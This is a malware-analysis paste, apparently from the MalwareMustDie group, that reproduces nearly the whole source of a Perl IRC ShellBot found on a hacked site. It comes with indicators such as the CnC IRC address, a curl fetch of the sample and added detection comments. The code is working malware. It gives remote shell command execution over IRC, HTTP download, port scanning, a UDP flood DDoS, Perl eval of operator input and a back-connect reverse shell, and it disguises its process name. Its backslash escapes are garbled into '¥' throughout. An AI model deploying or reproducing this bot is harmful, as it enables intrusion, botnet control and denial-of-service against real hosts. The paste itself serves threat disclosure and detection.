
Hacked Site with the US IRC Server's Perl ShellBot

MalwareMustDie Feb 12th, 2014 1,260 Never
  1. # MalwareMustDie!!
  2. # Found this evil Perl IRC Shell/Backdoor announced in:
  3. # https://twitter.com/unixfreaxjp/status/433629833889714176
  4. # CnC is an IRC server at 74.208.250.181, which is in a USA network: u17072928.onlinehome-server.com.|8560 |
  5. # 74.208.0.0/16 | ONEANDONE | US | ONEANDONE.NET | 1&1 INTERNET INC.
  6. #
  7. # PoC of the malicious activity is the snipped code below.
  8. # Detected: Backdoors, Faking many IRC Clients, HTTP downloader, Port Scanner and DDoS tools
  9. #
  10. # --- snips / start evidence ----
  11.  
  12. $ curl http://121.119.182.119/icons/web.is
  13.  
  14. #!/usr/bin/perl
  # Hard-coded bot configuration; these values are the static indicators of this sample.
  # Operator allow-lists: parse() acts on a PRIVMSG only when the sender's host matches an
  # entry of @hostauth and the sender's nick matches an entry of @mast3rs (case-insensitive).
  15. my @mast3rs = ("w","R");
  16.  
  17. my @hostauth = ("w");
  # Channel(s) the bot joins once the server has sent numeric 001.
  18. my @admchan=("#bug");
  19.  
  # IRC server list (one entry, the address named in the analyst header above);
  # an entry is picked at random unless $servidor already holds a value.
  20. my @server = ("74.208.250.181");
  21. $servidor= $server[rand scalar @server] unless $servidor;
  22.  
  23.  
  # $xeqt: prefix that parse() accepts in place of the bot's nick at the start of a command.
  24. my $xeqt = "!";
  # $homedir: the script chdir()s to this directory at startup.
  25. my $homedir = "/tmp";
  # $shellaccess: shell() returns immediately when this is false.
  26. my $shellaccess = 1;
  # $xstats: gates several of the status replies sent back over IRC.
  27. my $xstats = 1;
  # $pacotes: gates packet sending in the udp branch of bfunc() and in attacker().
  28. my $pacotes = 1;
  # $linas_max / $sleep: shell() sleeps $sleep seconds after every $linas_max relayed output lines.
  29. my $linas_max = 5;
  30. my $sleep = 6;
  # $portime: Timeout value passed to IO::Socket::INET for each port-scan probe.
  31. my $portime = 4;
  32.  
  # Value later written to $0, i.e. the name the process presents in process listings.
  33. my @fakeps = ("ps x");
  34.  
  # Base IRC nickname; getnick() appends a random number to it.
  35. my @nickname = ("LINUX");
  36.  
  # Ident used in the USER line sent by conectar().
  37. my @xident = ("KAST");
  # Runs `uname -a` at startup; the output becomes the IRC "real name", so the host's
  # kernel and hostname string is sent to the IRC server at registration.
  38. my @xname = (`uname -a`);
  39.  
  40. #################
  41. # Random Ports
  42. #################
  # Port used for the IRC connection (a single entry, so the random pick is fixed).
  43. my @rports = ("6667");
  44.  
  # Canned CTCP VERSION replies. One entry is chosen at random at startup and parse() returns it
  # to VERSION queries, so the bot presents itself as an ordinary IRC client.
  # NOTE(review): "¥001" appears where the CTCP delimiter "\001" is expected; this looks like a
  # rendering artefact of the paste, so strings in a live sample may differ from what is shown.
  45. my @Mrx = ("¥001mIRC32 v5.91 K.Mardam-Bey¥001","¥001mIRC v6.2 Khaled Mardam-Bey¥001",
  46.    "¥001mIRC v6.03 Khaled Mardam-Bey¥001","¥001mIRC v6.14 Khaled Mardam-Bey¥001",
  47.    "¥001mIRC v6.15 Khaled Mardam-Bey¥001","¥001mIRC v6.16 Khaled Mardam-Bey¥001",
  48.    "¥001mIRC v6.17 Khaled Mardam-Bey¥001","¥001mIRC v6.21 Khaled Mardam-Bey¥001",
  49.    "¥001Snak for Macintosh 4.9.8 English¥001",
  50.    "¥001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC¥001",
  51.    "¥001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)¥001",
  52.    "¥001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]¥001",
  53.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]¥001",
  54.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]¥001",
  55.    "¥001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]¥001",
  56.    "¥001ircN 7.27 + 7.0 - -¥001","¥001..(argon/1g) :bitchx-1.0c17¥001",
  57.    "¥001ircN 8.00 - he tries to tell me what I put inside of me -¥001",
  58.    "¥001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people¥001",
  59.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!¥001",
  60.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!¥001",
  61.    "¥001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!¥001",
  62.    "¥001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!¥001",
  63.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!¥001",
  64.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!¥001",
  65.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!¥001",
  66.    "¥001bitchx-1.0c18 :tunnelvision/1.2¥001","¥001PnP 4.22 - http://www.pairc.com/¥001",
  67.    "¥001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1ツ?9] : Keep it to yourself!¥001",
  68.    "¥001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras¥001",
  69.    "¥001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet¥001",
  70.    "¥001irssi v0.8.10 - running on Linux i586¥001","¥001irssi v0.8.10 - running on FreeBSD i386¥001",
  71.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there¥001",
  72.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there¥001");
  73.  
  74. # Default quick scan ports
  # Fixed port list probed by the "ps" branch of bfunc().
  75. my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
  76.  
  77. # xeQt
  78.  
  # Runtime identity: each value is a random pick from the matching configuration list.
  # With the single-entry lists in this sample the picks are fixed, except $Mrx (fake client string).
  79. #my $nick = "Power";
  80. my $nick = $nickname[rand scalar @nickname];
  81. my $realname = $xname[rand scalar @xname];
  82. my $ircname = $xident[rand scalar @xident];
  83. my $porta = $rports[rand scalar @rports];
  84. my $xproc = $fakeps[rand scalar @fakeps];
  85. my $Mrx = $Mrx[rand scalar @Mrx];
  # Banner string reported by the "version" branch of bfunc().
  86. my $version = 'PowerBots (C) GohacK';
  87.  
  # Signal setup: INT, HUP and TERM are set to IGNORE, so a default kill (SIGTERM) will not
  # stop the process. CHLD is ignored as well.
  88. $SIG{'INT'} = 'IGNORE';
  89. $SIG{'HUP'} = 'IGNORE';
  90. $SIG{'TERM'} = 'IGNORE';
  91. $SIG{'CHLD'} = 'IGNORE';
  92. $SIG{'PS'} = 'IGNORE';
  93.  
  94.  
  95. use IO::Socket;
  96. use Socket;
  97. use IO::Select;
  98. chdir("$homedir");
  # A command-line argument, when given, replaces the configured server.
  99. $servidor="$ARGV[0]" if $ARGV[0];
  # Overwrites $0 with the @fakeps value, which changes the name shown in process listings.
  # NOTE(review): during triage, identify the process by its executable and open sockets
  # rather than by the listed name.
  100. $0="$xproc"."¥0";
  # Forks and lets the parent exit, so the bot continues in the background.
  101. my $pid = fork;
  102. exit if $pid;
  103. die "[x] -> Cannot fork into background: $!" unless defined($pid);
  # Connection table keyed by socket, DCC transfer table, and the select set for DCC sockets.
  104. my %irc_servers;
  105. my %DCC;
  106. my $dcc_sel = new IO::Select->new();
  107.  
  # getnick(): returns a nickname made of a random @nickname entry followed by a random
  # integer below 20000. Used when the server reports the current nick as taken (433).
  108. sub getnick {
  109.   return "$nickname[rand scalar @nickname]".int(rand(20000));
  110. }
  111.  
  # getstore(url, file): fetches url through _get() and streams the response body into file.
  # Returns $main::http_get_result, which _trivial_http_get() sets to the HTTP status code.
  # This is the sample's download-to-disk path: the "down" branch of bfunc() calls it with
  # both arguments taken from the IRC message. A relative file name resolves against the
  # process's working directory ($homedir at startup).
  112. sub getstore ($$)
  113. {
  114.   my $url = shift;
  115.   my $file = shift;
  116.  
  # Tells _trivial_http_get() to write the body to GET_OUTFILE instead of returning it.
  117.   $http_stream_out = 1;
  118.   open(GET_OUTFILE, "> $file");
  # Reset the redirect-loop guard for this download.
  119.   %http_loop_check = ();
  120.   _get($url);
  121.   close GET_OUTFILE;
  122.   return $main::http_get_result;
  123. }
  # _get(url): works out where to send the request, then delegates to _trivial_http_get().
  # An http_proxy environment variable (matched in any letter case) is used when it is set;
  # otherwise only http:// URLs are handled. Anything else returns undef.
  # NOTE(review): the matches below read "=m," and "¥d" where a binding operator and "\d"
  # are expected; presumably a rendering artefact of the paste.
  124. sub _get
  125. {
  126.   my $url = shift;
  127.   my $proxy = "";
  128.   grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  129.   if (($proxy eq "") && $url =m,^http://([^/:]+)(?::(¥d+))?(/¥S*)?$,) {
  130.     my $host = $1;
  # Port defaults to 80 and the path to "/" when the URL omits them.
  131.     my $port = $2 || 80;
  132.     my $path = $3;
  133.     $path = "/" unless defined($path);
  134.     return _trivial_http_get($host, $port, $path);
  135.   } elsif ($proxy =m,^http://([^/:]+):(¥d+)(/¥S*)?$,) {
  # Proxy case: connect to the proxy and request the full URL as the path.
  136.     my $host = $1;
  137.     my $port = $2;
  138.     my $path = $url;
  139.     return _trivial_http_get($host, $port, $path);
  140.   } else {
  141.     return undef;
  142.   }
  143. }
  # _trivial_http_get(host, port, path): minimal HTTP/1.0 GET over a plain TCP socket.
  # Network indicators visible here: the request line "GET <path> HTTP/1.0" and the
  # User-Agent value "get-minimal/20000118/u".
  # With $http_stream_out set (getstore() does this) the body is written to GET_OUTFILE as it arrives.
  # Redirects with status 301, 302, 303 or 307 are followed through _get(); %http_loop_check
  # stops a URL from being followed twice.
  # Returns nothing if the connection fails, undef on a read error or a non-2xx status,
  # otherwise whatever is left in the buffer.
  144. sub _trivial_http_get
  145. {
  146.   my($host, $port, $path) = @_;
  147.   my($AGENT, $VERSION, $p);
  148.   #print "HOST=$host, PORT=$port, PATH=$path¥n";
  149.  
  150.   $AGENT = "get-minimal";
  151.   $VERSION = "20000118";
  152.  
  153.   $path =s/ /%20/g;
  154.  
  155.   require IO::Socket;
  156.   local($^W) = 0;
  157.   my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto   => 'tcp', Timeout  => 60) || return;
  158.  
  159.   $sock->autoflush;
  # The Host header carries the port only when it is not 80.
  160.   my $netloc = $host;
  161.   $netloc .= ":$port" if $port != 80;
  162.   my $request = "GET $path HTTP/1.0¥015¥012"
  163.               . "Host: $netloc¥015¥012"
  164.               . "User-Agent: $AGENT/$VERSION/u¥015¥012";
  165.   $request .= "Pragma: no-cache¥015¥012" if ($main::http_no_cache);
  166.   $request .= "¥015¥012";
  167.   print $sock $request;
  168.   my $buf = "";
  169.   my $n;
  170.   my $b1 = "";
  171.   while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
  # First read: keep a copy (headers are parsed from it below) and strip the header block from $buf.
  172.     if ($b1 eq "") {
  173.       $b1 = $buf;
  174.       $buf =s/.+?¥015?¥012¥015?¥012//s;
  175.     }
  176.     if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  177.   }
  178.   return undef unless defined($n);
  # Status defaults to 200 when no status line is recognised.
  179.   $main::http_get_result = 200;
  180.   if ($b1 =m,^HTTP/¥d+¥.¥d+¥s+(¥d+)[^¥012]*¥012,) {
  181.     $main::http_get_result = $1;
  182.     # print "CODE=$main::http_get_result¥n$b1¥n";
  183.     if ($main::http_get_result =/^30[1237]/ && $b1 =/¥012Location:¥s*(¥S+)/) {
  184.       my $url = $1;
  185.       return undef if $http_loop_check{$url}++;
  186.       return _get($url);
  187.     }
  188.     return undef unless $main::http_get_result =/^2/;
  189.   }
  190.   return $buf;
  191. }
  # Select set holding the IRC server sockets polled by the main loop.
  192. $sel_cliente = IO::Select->new();
  # sendraw([socket,] line): writes one newline-terminated line to the given socket, or to
  # $IRC_cur_socket when only the line is passed. All IRC output of the bot goes through here.
  193. sub sendraw {
  194.   if ($#_ == '1') {
  195.     my $socket = $_[0];
  196.     print $socket "$_[1]¥n";
  197.   } else {
  198.       print $IRC_cur_socket "$_[0]¥n";
  199.   }
  200. }
  # conectar(nick, server, port): opens the TCP connection to the IRC server and registers.
  # Returns 1 when the connection cannot be made. On success the socket becomes
  # $IRC_cur_socket, is added to $sel_cliente, and is recorded in %irc_servers together
  # with host, port, nick and the local socket address.
  # The USER line carries $ircname, the local socket address and $realname (the `uname -a`
  # output), so the infected host's address and kernel string are disclosed to the server.
  201. sub conectar {
  202.    my $meunick = $_[0];
  203.    my $servidor_con = $_[1];
  204.    my $porta_con = $_[2];
  205.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  206.    if (defined($IRC_socket)) {
  207.      $IRC_cur_socket = $IRC_socket;
  208.      $IRC_socket->autoflush(1);
  209.      $sel_cliente->add($IRC_socket);
  210.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  211.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  212.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  213.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  214.      nick("$meunick");
  215.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  216.      sleep 2;
  217.    }
  218. }
  # Main loop: reconnects until a server entry exists, services DCC sockets, then reads from
  # the ready IRC sockets (0.6 s poll) and hands complete lines to parse(). A trailing
  # partial line is kept in $line_temp and prepended to the next line read.
  # NOTE(review): the reconnect loop has no delay on the failure path, so a blocked or
  # unreachable server may show up as rapid repeated connection attempts to the IRC port.
  219. my $line_temp;
  220. while( 1 ) {
  221.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  222.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  223.    &DCC::connections;
  224.    my @ready = $sel_cliente->can_read(0.6);
  225.    next unless(@ready);
  226.    foreach $fh (@ready) {
  227.      $IRC_cur_socket = $fh;
  228.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  229.      $nread = sysread($fh, $msg, 4096);
  # A zero-byte read means the server closed the connection: drop the socket and its table
  # entry, which makes the reconnect loop above run again.
  230.      if ($nread == 0) {
  231.         $sel_cliente->remove($fh);
  232.         $fh->close;
  233.         delete($irc_servers{$fh});
  234.      }
  235.      @lines = split (/¥n/, $msg);
  236.      for(my $c=0; $c<= $#lines; $c++) {
  237.        $line = $lines[$c];
  238.        $line=$line_temp.$line if ($line_temp);
  239.        $line_temp='';
  240.        $line =s/¥r$//;
  # Every line but the last is complete. The last one is parsed only if it is the sole line,
  # ended in a carriage return, or is a server "NOTICE AUTH" line; otherwise it is buffered.
  241.        unless ($c == $#lines) {
  242.          parse("$line");
  243.        } else {
  244.            if ($#lines == 0) {
  245.              parse("$line");
  246.            } elsif ($lines[$c] =/¥r$/) {
  247.                parse("$line");
  248.            } elsif ($line =/^(¥S+) NOTICE AUTH :¥*¥*¥*/) {
  249.                parse("$line");
  250.            } else {
  251.                $line_temp = $line;
  252.            }
  253.        }
  254.       }
  255.    }
  256. }
  257.  
  # parse(line): handles one line received from the IRC server.
  #  - PING is answered with PONG.
  #  - PRIVMSG: a CTCP VERSION query is answered with the canned client string in $Mrx and a
  #    CTCP PING with PONG, regardless of who asks.
  #    Commands are acted on only when the sender's host matches @hostauth and the sender's
  #    nick matches @mast3rs. Those are the strings relayed by the server; no other
  #    authentication is visible in this routine. Accepted messages go to shell(), ircase()
  #    or bfunc().
  #  - NICK, 433 and 001 keep $meunick in step with the server. After 001 the bot sends
  #    "JOIN <channel> muietie" for each @admchan entry.
  258. sub parse {
  259.    my $servarg = shift;
  260.    if ($servarg =/^PING ¥:(.*)/) {
  261.      sendraw("PONG :$1");
  262.    } elsif ($servarg =/^¥:(.+?)¥!(.+?)¥@(.+?) PRIVMSG (.+?) ¥:(.+)/) {
  # Captures: sender nick, sender host, target (channel or nick) and message text.
  263.        my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5;
  264.        if ($args =/^¥001VERSION¥001$/) {
  265.          notice("$pn", "".$Mrx."");
  266.        }
  267.        elsif ($args =/^¥001PING¥s+(¥d+)¥001$/) {
  268.          notice("$pn", "¥001PONG¥001");
  269.        }
  # Authorisation gate: host first, then nick.
  270.        if (grep {$_ =/^¥Q$hostnam3¥E$/i } @hostauth) {
  271.        if (grep {$_ =/^¥Q$pn¥E$/i } @mast3rs) {
  # A private message to the bot's own nick is treated as a shell command.
  272.          if ($onde eq "$meunick"){
  273.            shell("$pn", "$args");
  274.         }
  275.     if ($args =/^!(.*)/){
  276.        ircase("$pn","$chan","$1");
  277.     }
  # Messages that start with the bot's nick or the $xeqt prefix are routed by their next character.
  278.         if ($args =/^(¥Q$meunick¥E|¥Q$xeqt¥E)¥s+(.*)/ ) {
  279.             my $natrix = $1;
  280.             my $arg = $2;
  281.             if ($arg =/^¥!(.*)/) {
  282.               ircase("$pn","$onde","$1");
  283.             } elsif ($arg =/^¥@(.*)/) {
  # Replies go to the channel, or to the sender when the message was private.
  284.                 $ondep = $onde;
  285.                 $ondep = $pn if $onde eq $meunick;
  286.                 bfunc("$ondep","$1");
  287.             } else {
  288.                 shell("$onde", "$arg");
  289.             }
  290.           }
  291.         }
  292.       }
  293.    } elsif ($servarg =/^¥:(.+?)¥!(.+?)¥@(.+?)¥s+NICK¥s+¥:(¥S+)/i) {
  294.        if (lc($1) eq lc($meunick)) {
  295.          $meunick=$4;
  296.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  297.        }
  298.    } elsif ($servarg =m/^¥:(.+?)¥s+433/i) {
  299.        $meunick = getnick();
  300.        nick("".$meunick."-");
  301.    } elsif ($servarg =m/^¥:(.+?)¥s+001¥s+(¥S+)¥s/i) {
  302.        $meunick = $2;
  303.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  304.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  305.        foreach my $canal (@admchan){
  306.          sendraw("JOIN $canal muietie");
  307.        }
  308.    }
  309. }
  # bfunc(target, command): runs one built-in function in a double-forked child and reports
  # progress to <target> over IRC. The parent waits only for the intermediate child, so the
  # worker is detached from the main loop. Branches, by leading keyword:
  #   ps / nmap - TCP connect scans (fixed @portas list, or a numeric port range)
  #   rm        - removes a fixed set of names under /var/tmp
  #   version   - reports $version
  #   down      - getstore(): HTTP download to a local file
  #   udp       - UDP packet flood, gated by $pacotes
  #   back      - connects out and attaches a shell to the socket
  # Host artefacts named in this routine: the /var/tmp names in the rm branch and the
  # path /tmp/.mrx in the back branch.
  310. sub bfunc {
  311.   my $printl = $_[0];
  312.   my $funcarg = $_[1];
  313.   if (my $pid = fork) {
  314.      waitpid($pid, 0);
  315.   } else {
  316.       if (fork)
  317.        {
  318.          exit;
  319.        }
  320.    else
  321.    {
  322.       # Quick scan
  323.            if ($funcarg =/^ps (.*)/) {
  324.              my $hostip="$1";
  325.         sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 default");
  326.              my (@aberta, %porta_banner);
  327.              foreach my $porta (@portas)  {
  328.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  329.                 if ($scansock) {
  330.                    push (@aberta, $porta);
  331.                    $scansock->close;
  332.          sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  333.                 }
  334.              }
  335.              if (@aberta) {
  336.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
  337.              } else {
  338.                  sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002[x]¥0034 No open ports found on¥002 $1");
  339.              }
  340.            }
  341.       # NMAP, lol
  342.            elsif ($funcarg =/^nmap¥s+(.*)¥s+(¥d+)¥s+(¥d+)/)
  343.       {
  344.               my $hostname="$1";
  345.               my $portstart = "$2";
  346.                my $portend = "$3";
  347.                my (@abertas, %porta_banner);
  348.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312xMap Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 $2-$3");
  349.                foreach my $porta ($portstart..$portend)
  350.              {
  351.                my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  352.                if ($scansock) {
  353.                  push (@abertas, $porta);
  354.                  $scansock->close;
  355.                  if ($xstats)
  356.        {
  357.                    sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  358.                  }
  359.                }
  360.              }
  361.              if (@abertas) {
  362.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Scan Complate¥003¥002");
  363.              } else {
  364.                sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002¥00312No ports found..¥002");
  365.              }
  366.             }
  367.       # Remove
  # NOTE(review): presumably these are names of files dropped alongside this bot; their
  # presence under /var/tmp is worth checking on an affected host.
  368.       elsif ($funcarg =/^rm/)
  369.       {
  370.          system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*");
  371.       sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Quickdel)¥002¥00314 Removed files and folders ");
  372.       }
  373.       # Version
  374.       elsif ($funcarg =/^version/)
  375.       {
  376.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Version)¥002¥00314 $version ");
  377.       }
  378.       # Download
  379.            elsif ($funcarg =/^down¥s+(.*)¥s+(.*)/)
  380.       {
  381.               getstore("$1", "$2");
  382.               sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Download)¥002¥00314 Page: $2 (File: $1)") if ($xstats);
  383.            }
  384.        # Udp
  385.             elsif ($funcarg =/^udp¥s+(.*)¥s+(¥d+)¥s+(¥d+)/) {
  386.               return unless $pacotes;
  387.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  388.               my $alvo=inet_aton("$1");
  389.               my $porta = "$2";
  390.               my $tempo = "$3";
  391.               my $pacote;
  392.               my $pacotese;
  393.               my $fim = time + $tempo;
  394.               my $pacota = 1;
  395.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP DDoSing)¥003 Attacking¥002: $1 - ¥002Time¥002: $tempo"."seconds");
  396.               while (($pacota == "1") && ($pacotes == "1")) {
  397.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
  398.                 $pacote=$rand x $rand x $rand;
  399.                 $porta = int(rand 65000) +1 if ($porta == "0");
  400.                 send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
  401.               }
  402.               if ($xstats)
  403.               {
  404.                sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP Complete):¥003¥002 $1 - ¥002Sendt¥002: $pacotese"."kb - ¥002Time¥002: $tempo"."seconds");
  405.              }
  406.             }
  407.  
  408.        # Backconnect
  # STDIN, STDOUT and STDERR are re-opened onto the outbound socket before the shell is
  # started, so the shell's I/O travels over that TCP connection.
  409.             elsif ($funcarg =/^back¥s+(.*)¥s+(¥d+)/) {
  410.               my $host = "$1";
  411.               my $porta = "$2";
  412.               my $proto = getprotobyname('tcp');
  413.               my $iaddr = inet_aton($host);
  414.               my $paddr = sockaddr_in($porta, $iaddr);
  415.               my $shell = "/bin/sh -i";
  416.               if ($^O eq "MSWin32") {
  417.                 $shell = "cmd.exe";
  418.               }
  419.               socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  420.               connect(SOCKET, $paddr) or die "connect: $!";
  421.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002[x] ->¥0034 Injection ...");
  422.               open(STDIN, ">&SOCKET");
  423.               open(STDOUT, ">&SOCKET");
  424.               open(STDERR, ">&SOCKET");
  425.               system("$shell");
  426.          system("cd /tmp/.mrx");
  427.               close(STDIN);
  428.               close(STDOUT);
  429.               close(STDERR);
  430.             }
  431.            exit;
  432.        }
  433.   }
  434. }
  435.  
  # ircase(sender, target, command): dispatcher for the IRC-side commands. The branches
  # cover channel membership and modes, messaging and message flooding, nick changes,
  # connecting to another server, DCC file sending, raw IRC lines, and toggling the
  # $xstats / $pacotes switches.
  # Security-relevant: the "eval" branch passes text received over IRC to string eval, so
  # anyone who passes the nick/host check in parse() can run arbitrary Perl in this process.
  436. sub ircase {
  437.   my ($kem, $printl, $case) = @_;
  438.  
  439.    if ($case =/^join (.*)/) {
  440.      j("$1");
  441.    }
  442.    elsif ($case =/^part (.*)/) {
  443.       p("$1");
  444.    }
  445.    elsif ($case =/^rejoin¥s+(.*)/) {
  446.       my $chan = $1;
  447.       if ($chan =/^(¥d+) (.*)/) {
  448.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  449.           p("$2");
  450.           j("$2");
  451.         }
  452.       } else {
  453.           p("$chan");
  454.           j("$chan");
  455.       }
  456.    }
  457.    elsif ($case =/^op/) {
  458.       op("$printl", "$kem") if $case eq "op";
  459.       my $oarg = substr($case, 3);
  460.       op("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  461.    }
  462.    elsif ($case =/^deop/) {
  463.       deop("$printl", "$kem") if $case eq "deop";
  464.       my $oarg = substr($case, 5);
  465.       deop("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  466.    }
  467.    elsif ($case =/^voice/) {
  468.       voice("$printl", "$kem") if $case eq "voice";
  469.       $oarg = substr($case, 6);
  470.       voice("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  471.    }
  472.    elsif ($case =/^devoice/) {
  473.       devoice("$printl", "$kem") if $case eq "devoice";
  474.       $oarg = substr($case, 8);
  475.       devoice("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  476.    }
  477.    elsif ($case =/^msg¥s+(¥S+) (.*)/) {
  478.       msg("$1", "$2");
  479.    }
  480.    elsif ($case =/^flood¥s+(¥d+)¥s+(¥S+) (.*)/) {
  481.       for (my $cf = 1; $cf <= $1; $cf++) {
  482.         msg("$2", "$3");
  483.       }
  484.    }
  485.    elsif ($case =/^ctcpflood¥s+(¥d+)¥s+(¥S+) (.*)/) {
  486.       for (my $cf = 1; $cf <= $1; $cf++) {
  487.         ctcp("$2", "$3");
  488.       }
  489.    }
  490.    elsif ($case =/^ctcp¥s+(¥S+) (.*)/) {
  491.       ctcp("$1", "$2");
  492.    }
  493.    elsif ($case =/^invite¥s+(¥S+) (.*)/) {
  494.       invite("$1", "$2");
  495.    }
  496.    elsif ($case =/^nick (.*)/) {
  497.       nick("$1");
  498.    }
  # Opens an additional IRC connection through conectar(), always on port 6667.
  499.    elsif ($case =/^jump¥s+(¥S+)¥s+(¥S+)/) {
  500.        conectar("$2", "$1", 6667);
  501.    }
  # Offers a local file to an IRC user over DCC; see DCC::SEND.
  502.    elsif ($case =/^send¥s+(¥S+)¥s+(¥S+)/) {
  503.       DCC::SEND("$1", "$2");
  504.    }
  505.    elsif ($case =/^raw (.*)/) {
  506.       sendraw("$1");
  507.    }
  508.    elsif ($case =/^eval (.*)/) {
  509.       eval "$1";
  510.    }
  511.    elsif ($case =/^rj¥s+(¥S+)¥s+(¥d+)/) {
  512.     sleep int(rand($2));
  513.     j("$1");
  514.    }
  515.    elsif ($case =/^rp¥s+(¥S+)¥s+(¥d+)/) {
  516.     sleep int(rand($2));
  517.     p("$1");
  518.    }
  519.    elsif ($case =/^quit/) {
  520.      quit();
  521.    }
  522.    elsif ($case =/^rand/) {
  523.     my $novonick = getnick();
  524.      nick("$novonick");
  525.    }
  526.    elsif ($case =/^stat (.*)/) {
  527.      if ($1 eq "on") {
  528.       $xstats = 1;
  529.       msg("$printl", "Satus enabled");
  530.      } elsif ($1 eq "off") {
  531.       $xstats = 0;
  532.       msg("$printl", "Status disable");
  533.      }
  534.    }
  535.    elsif ($case =/^bang (.*)/) {
  536.      if ($1 eq "on") {
  537.       $pacotes = 1;
  538.       msg("$printl", "[x] Bang mode enabled") if ($xstats == "1");
  539.      } elsif ($1 eq "off") {
  540.       $pacotes = 0;
  541.       msg("$printl", "[x] Bang mode disabled") if ($xstats == "1");
  542.      }
  543.    }
  544. }
  # shell(target, command): the remote command execution path. Returns at once when
  # $shellaccess is false. A "cd" command is handled in-process with chdir(); anything else
  # is run through backticks in a double-forked child with stderr merged into the output,
  # and every output line is relayed to <target> as a PRIVMSG.
  # For detection: the command text comes straight from the IRC message, and the commands
  # run as descendants of this perl process with its privileges.
  545. sub shell {
  546.   return unless $shellaccess;
  547.   my $printl=$_[0];
  548.   my $comando=$_[1];
  549.   if ($comando =/cd (.*)/) {
  550.     chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
  551.     return;
  552.   }
  553.   elsif ($pid = fork) {
  554.      waitpid($pid, 0);
  555.   } else {
  556.       if (fork) {
  557.          exit;
  558.        } else {
  559.            my @resp=`$comando 2>&1 3>&1`;
  560.            my $c=0;
  561.            foreach my $linha (@resp) {
  562.              $c++;
  563.              chop $linha;
  564.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  # Output throttle: pause $sleep seconds after every $linas_max lines.
  565.              if ($c >= "$linas_max") {
  566.                $c=0;
  567.                sleep $sleep;
  568.              }
  569.            }
  570.            exit;
